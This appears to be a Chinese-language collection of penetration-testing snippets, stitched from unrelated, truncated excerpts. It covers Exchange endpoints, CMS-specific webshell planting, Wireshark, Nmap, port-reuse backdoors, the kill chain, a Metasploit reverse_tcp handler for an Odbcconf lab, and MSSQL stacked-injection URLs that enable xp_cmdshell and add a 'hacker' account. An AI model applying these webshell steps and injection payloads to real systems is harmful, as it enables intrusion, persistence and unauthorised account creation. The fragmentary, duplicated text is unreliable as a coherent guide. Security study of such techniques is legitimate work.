渗透测试

很不错的高质量文章 ====== 0x00 Exchange简介 Windows Exchange Server，是国内外应用非常广泛的邮件服务器，是微软公司的一套电子邮件服务组件。 简单而言，Exchange server可以被用来构架应用于企业、学校的邮件系统。所以通常渗透测试过程中也会对其进行攻击尝试。 0x01 Exchange Endpoint 通常Exchange Server 有以下endpoint，即可访问的连接如下： 复制 123456789 https://Exchangeserver/AutoDiscover/https://Exchangeserver/Ecp/https://Exchangeserver/EWS/https://Exchangeserver/mapi/https://Exchangeserver/Microsoft-Server-ActiveSync/https://Exchangeserver/OAB/https://Exchangeserver/OWA/https://Exchangeserver/PowerShell/https://Exchangeserver/Rpc/ 每个endpoint的作用如下： endpoint 说明 /autodiscover 自Exchange Server 2007开始推出的一项自动服务

常见cms 良精、科讯、动易、aspcms、dz 米拓cms、phpcms2008、帝国cms、phpv9 phpweb、dedecms 良精 方法： 1、数据库备份拿shell 上传图片——点击数据库备份——改为脚本格式——添加账号，讲一句话添加在用户名处——备份——改为脚本格式 2、双文件上传 3、配置插马 4、修改文件上传类型直接上传 科讯（用IE） /admin/admin.asp 后台路径 1、利用解析漏洞 2、设置——网站基本信息设置——默认允许上传文件类型，将asp改为aaspsp（会将asp替换为空） 内容——图片添加——上传时改为aaspsp 设置——基本设置——其它选项——通用页面目录——html/a.asp/（目录解析）——标签——自定义静态标签——增加静态标签——插入一句话——自定义页面——生成一个页面，会在a.asp目录下 动易（学校，简单的企业） 在网站配置中插马——连接inc/config.asp文件 数据库备份 双文件上传 aspcms 界面风格——编辑模板/css文件（利用IIS6.0解析漏洞）——添加——文件系统——a.asp;html——内容插入一句话 拓展功能——幻灯片设置——插马 dz uckey或利用插件上传（常见的网站discuz x2.5） 后台 admin.php或cu_server 站长——ucenter设置（通过配置插马

互联网渗透测试之Wireshark的高级应用 1.1说明 在本节将介绍 Wireshark的一些高级特性 1.2. "Follow TCP Stream" 如果你处理 TCP协议，想要查看Tcp流中的应用层数据，"Following TCP streams"功能将会很有用。如果你项查看telnet流中的密码，或者你想尝试弄明白一个数据流。或者你仅仅只需要一个显示过滤来显示某个TCP流的包。这些都可以通过Wireshark的"Following TCP streams"功能来实现。 在包列表中选择一个你感兴趣的 TCP包，然后选择Wireshark工具栏菜单的"Following TCP Streams"选项(或者使用包列表鼠标右键的上下文菜单)。然后，Wireshark就会创建合适的显示过滤器，并弹出一个对话框显示TCP流的所有数据。如 图 1.1 “"Follow TCP Stream"对话框” 所示 注意 值得注意的是：Follow Tcp Stream会装入一个显示过滤来选择你已经选择的Tcp流的所有包。 1.2.1. "Follow TCP Stream"对话框 图 1.1. "Follow TCP Stream"对话框 流的内容出现的顺序同他们在网络中出现的顺序一致。从 A到B的通信标记为红色，从B到A的通信标记为蓝色。当然，如果你喜欢的话你可以从"Edit

大纲 　　 管理员权限拿shell 普通权限拿shell 常见cms拿shell 进后台主要是可以对网站前台的内容，样式等做操作，要改脚本的内容的权限只有在webshell的权限下才可以（某些情况除外）。 管理员权限拿shell 需要有管理员权限才可以拿shell 通常需要登录后台执行相关操作 直接上传拿shell 国内多对上传类型进行了限制，需要在进行绕过操作 示例：织梦后台查找（改过之后的） Google intext:powerd by DedeCMSV57_UTD8_SP2 DEDECMS V5.7 拿到织梦后台，基本就拿到了shell 文件式管理器->可修改网站脚本内容，也可以上传脚本 若遇见文件权限问题，可以修改文件名为../往上级目录翻 数据库备份拿shell 网站上传的文件后缀名进行过滤，不允许上传脚本类型文件，如asp，php，jsp，aspx等，二网站具有数据库备份的功能，这时我们可以将webshell格式先改为可上传的格式，然后，将找到上传后的文件路径通过数据库备份，将文件备份为脚本格式。 示例：南方数据 v7.0 良精通用企业网站管理系统 有时会将系统管理中的按钮删除，但是功能是依旧存在的，（脚本文件名，数据库备份：Manage_backup.asp）可以在网站检查中，将其他连接的地址改为数据库备份的地址。阉割版的网站，常见于ecshop，wordpress

互联网渗透测试之Wireshark的高级应用 1.1说明 Wireshark的一些高级特性 TCP协议，想要查看Tcp流中的应用层数据，"Following TCP streams"功能将会很有用。如果你项查看telnet流中的密码，或者你想尝试弄明白一个数据流。或者你仅仅只需要一个显示过滤来显示某个TCP流的包。这些都可以通过Wireshark的"Following TCP streams"功能来实现。 TCP包，然后选择Wireshark工具栏菜单的"Following TCP Streams"选项(或者使用包列表鼠标右键的上下文菜单)。然后，Wireshark就会创建合适的显示过滤器，并弹出一个对话框显示TCP流的所有数据。如所示 注意 值得注意的是：Follow Tcp Stream会装入一个显示过滤来选择你已经选择的Tcp流的所有包。 图 A到B的通信标记为红色，从B到A的通信标记为蓝色。当然，如果你喜欢的话你可以从"Edit/Preferences"菜单项的"Colores"修改颜色。 XXX - What about line wrapping (maximum line length) and CRNL conversions? TCP流不能实时更新。想得到最近的内容需要重新打开对话框。 你可以在此对话框执行如下操作： Save As 以当前选择格式保存流数据。

目录扫描： 扫描站点的目录，寻找敏感文件（目录名、探针文件、后台、robots.txt、备份文件） 目录： 站点结构，权限控制不严格（列目录） phpinfo.php、readme.txt、config.txt inurl:admin.php、inurl:admin.asp robots.txt： 一般存放在站点根目录，如果管理员对于robots.txt文件管理不合理，就会造成信息泄露 www.rar 二、扫描工具 1.御剑后台扫描工具： 2.DirBuster： 需要依赖Java的配置环境 原理： 使用字典，做请求 3.Nmap 三、Nmap 1.定义 Nmap： 最早是Linux中的扫面和嗅探工具，网络连接扫描工具，主要负责探测主机存活（是否开机）、开启服务（扫端口）、安全性问题（高级用法//script）、系统类型（OS类型） nmap需要配置环境变量 3.命令行模式的用法： 1 nmap -h 帮助信息 2 nmap 目标IP 扫描单个IP 状态： ״̬ 含义 open 开启 closed 关闭 filtered 数据包被过滤，探测包被拦截，无法定位端口 是否开启 unfiltered nmap无法判断该端口是否开启 open|filtered 开放或者被过滤 closed|filtered 关闭或者被过滤 nmap 192.168.211.0/24 扫描整个网段 1

补充一下端口复用的知识 端口复用也是很老的后门技术，主要是劫持 web服务器相关进程/服务的内存空间、系统API甚至劫持网络驱动 去达到目的， 在winsocket的实现中，对于服务器的绑定是可以多重绑定的，在确定多重绑定使用谁的时候，根据一条原则是谁的指定最明确则将包递交给谁，而且没有权限之分。这种多重绑定便称之为端口复用。 这里总结的是基于web服务组合HTTP.sys驱动进行端口服用后门维权。 参考：https://docs.microsoft.com/zh-cn/dotnet/framework/wcf/feature-details/configuring-the-net-tcp-port-sharing-service https://docs.microsoft.com/zh-cn/dotnet/framework/wcf/feature-details/net-tcp-port-sharing 简单来说，刚引入TCP/IP协议的时候，TCP/IP 通过为每一个应用程序协议分配一个唯一的 16 位端口号，从而 使用端口号来区分应用程序 。 不同的应用共享相同的web服务器端口 。 在 HTTP.SYS 模型中，许多不同的 HTTP 应用程序的通信中将多路 复用 这为防火墙管理员提供了一个公共控制点

渗透测试简介： 渗透测试是通过模拟恶意黑客的攻击方法，来评估计算机网络系统安全的一种评估方法。 渗透测试流程： 测试范围确定->测试时间确定->可接受的测试底线->信息收集->漏洞发现->漏洞利用->后渗透测试->文档编写 PTES标准渗透测试流程 ： 前期交互阶段->情报收集阶段->威胁建模阶段->漏洞分析阶段->渗透攻击阶段->后渗透攻击阶段->撰写报告阶段 WEB应用渗透测试流程 ： 洛克希德・马丁定义的“杀伤链”（网络杀伤链）： 侦查跟踪：攻击者搜寻目标的弱点，具体手段如收集钓鱼攻击用的登陆凭证和信息 武器构建：使用漏洞和后门制作一个可以发送武器的载体 载荷投递：将网络武器包向目标投递，如发送一封带有恶意链接的欺诈邮件 漏洞利用：在受害者的系统上运行利用代码 安装植入：在目标位置安装恶意软件 命令和控制:为攻击者建立可远程控制目标系统的路径 目标达成：攻击者远程完成其预期目标 APT攻击（高级持续性威胁） ：指的是由攻击者准备的高级攻击行动，这里不包括一般的攻击行为，例如网站挂马、加外链等；任何APT攻击的基本原则包括详细的准备和逐步战略，在这里，我们将APT攻击所设计的阶段的序列（称为杀伤链）。 杀伤链的相关步骤： 侦察阶段->工具选择（武器化阶段）->钓鱼阶段->载荷投递阶段->感染阶段->内网移动阶段->目标行动阶段 网络杀伤链攻击流程： 科来 ：信息收集->网络入侵

0x01 Odbcconf ODBCCONF.exe是一个命令行工具，允许配置ODBC驱动程序和数据源。 微软官方文档： https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017 ODBCCONF.exe是一个与Microsoft公司的Microsoft数据访问组件相关联的进程。 说明 ： Odbcconf.exe所在路径已被系统添加PATH环境变量中，因此，Odbcconf命令可识别，需注意x86，x64位的Odbcconf调用。 Windows 2003 C:\WINDOWS\system32\odbcconf.exe C:\WINDOWS\SysWOW64\odbcconf.exe Windows 7 C:\Windows\System32\odbcconf.exe C:\Windows\SysWOW64\odbcconf.exe 0x02 攻击机：kali 靶机：win7 Msf : msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp

使用xp_cmdshell需要堆叠注入，http://192.168.190.148/less-1.asp?id=1';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; -- 使用xp_cmdshell添加账户，http://192.168.190.148/less-1.asp?id=1';exec master..xp_cmdshell 'net user hacker 123456 /add'；-- 如果想要看到执行结果，就使用语句创建一个临时表，写入命令执行结果，在读取 数据库表 master..syslogins, master..sysprocesses 列名 name, loginname 数据库凭据 SELECT user,password FROM master.dbo.syslogins 当前用户 user, system_user, suser_sname(), is_srvrolemember('sysadmin') waitfor delay'0:0:5',mssql的服务器延时 使用sqlmap对Mssql注入漏洞利用 同mysql --force-pivoting 参数，强制显示结果